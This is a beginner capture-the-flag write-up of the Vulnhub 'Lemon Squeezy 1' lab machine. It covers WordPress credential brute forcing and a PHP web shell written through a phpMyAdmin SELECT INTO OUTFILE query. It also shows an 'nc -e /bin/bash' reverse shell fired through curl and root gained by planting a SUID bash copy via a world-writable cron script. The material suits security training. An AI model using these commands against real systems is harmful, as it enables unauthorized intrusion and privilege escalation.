Vulnhub: Lemon Squeezy 1
data:image/s3,"s3://crabby-images/40b7e/40b7e595dae30f56d5ad4a1ca8be68aa79309143" alt="Cover Image Vulnhub: Lemon Squeezy 1"
Difficulty | Release Date | Author |
---|---|---|
Beginner | 26 Apr 2020 | James Hay |
Summary⌗
For this box we only get one port running a web server and we discover wordpress and phpmyadmin by directory bruteforcing. On the wordpress application we bruteforce credentials of the users discovered and then discover more credentials stored in a draft post. With this new credentials we access phpmyadmin and write to a file using an sql query. This serves as our initial foothold and we then escalate privileges by abusing a cron job running as root that executes a world writeable script.
Reconnaissance⌗
Nmap
Nmap scan report for 192.168.191.134
Host is up (0.00014s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:FF:26:DE (VMware)
Enumeration⌗
80 (HTTP)⌗
Visiting this page on the browser only serves the apache default page, confirming what nmap found in title.
After performing a directory bruteforce using ffuf we get the following directories:
ffuf -ic -c -u 'http://192.168.191.134/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 50
data:image/s3,"s3://crabby-images/4c07a/4c07a7a3f9fea40c7f16b9d462e9a940084fb886" alt=""
Checking the /wordpress directory, we see a basic wordpress site with not much information.
data:image/s3,"s3://crabby-images/ebab0/ebab0a403e2052a3f39006ffa7a7a79b4a36e91d" alt=""
Performing enumeration using wpscan, the only interesting information gathered is the usernames.
wpscan --url http://lemonsqueezy/wordpress -e ap,at,tt,cb,dbe,u -o wpscan.out --api-token
data:image/s3,"s3://crabby-images/42287/42287f9f1164340ea88959b0d2f9560bfa89756d" alt=""
Bruteforcing the credentials for each user, we discover the password of the orange user.
wpscan --url http://lemonsqueezy/wordpress -U orange -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt
data:image/s3,"s3://crabby-images/3f397/3f397b5cb1ffee29af62b7a8e9114669656d6272" alt=""
After logging into wordpress with the discovered credentials orange:ginger, we find another password in drafts.
data:image/s3,"s3://crabby-images/aa9a2/aa9a211b6883c3ad50ccc1b6bd3483603a4cb653" alt=""
With this password, we are able to login to phpmyadmin as the orange user.
data:image/s3,"s3://crabby-images/1cd0a/1cd0aa4582a3cec4abaad88a712c86783764facd" alt=""
Successful login:
data:image/s3,"s3://crabby-images/d25b9/d25b947d2af6065e14e71d6271e6ebf685aaa28a" alt=""
By logging in we can abuse this access by writing a file to disk that contains php by using an sql statement.
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php"
data:image/s3,"s3://crabby-images/6db17/6db178a8b75364bfc344c7e4133c932d943c94b4" alt=""
We can then verify that we have successful command execution, by running the whoami command.
data:image/s3,"s3://crabby-images/d07f5/d07f5e82c76ce446283a2bc6961356f3ab530e18" alt=""
Shell as www-data⌗
Running the below curl command we are able to get a reverse shell:
curl "http://192.168.191.134/wordpress/shell.php?cmd=nc+-e+/bin/bash+192.168.191.1+9000+%26"
data:image/s3,"s3://crabby-images/31585/315850f5d754f80f47612d33c2d9f4a1f17dc174" alt=""
After performing some manual local enumeration, we discover a cron job running as root.
data:image/s3,"s3://crabby-images/52ab6/52ab6488ac767ef6e01556e120a4b33614ad5fde" alt=""
The script being executed in the cron job is world writeable and the www-data user can write to it.
data:image/s3,"s3://crabby-images/392c6/392c6424b8cdfa98f04c1aa0003329a61ef6f32c" alt=""
Shell as root⌗
After changing the script to the below command we can create a bash binary with suid permissions.
#!/bin/bash
cp /bin/bash /suidbash
chmod u+s /suidbash
data:image/s3,"s3://crabby-images/77803/778034c9803aebb1aa881eb384b6f3b9279fdbee" alt=""
Once the cron is executed we get the binary and can escalate to root shell and read root.txt.
./suidbash -p
data:image/s3,"s3://crabby-images/b6169/b616979d6e28cf121ea71bf71dc1765f4e6821eb" alt=""
Extras⌗
- It seems I forgot user.txt and it is in /var/www.
data:image/s3,"s3://crabby-images/f4692/f46929bbae0bf6bba517727d6c28e4945c5a8a41" alt=""
- We could write to the wordpress folder from phpmyadmin because it was world-writeable.
data:image/s3,"s3://crabby-images/761b9/761b9c87a0c8830d90d8c19a39c1d7344b1ced6d" alt=""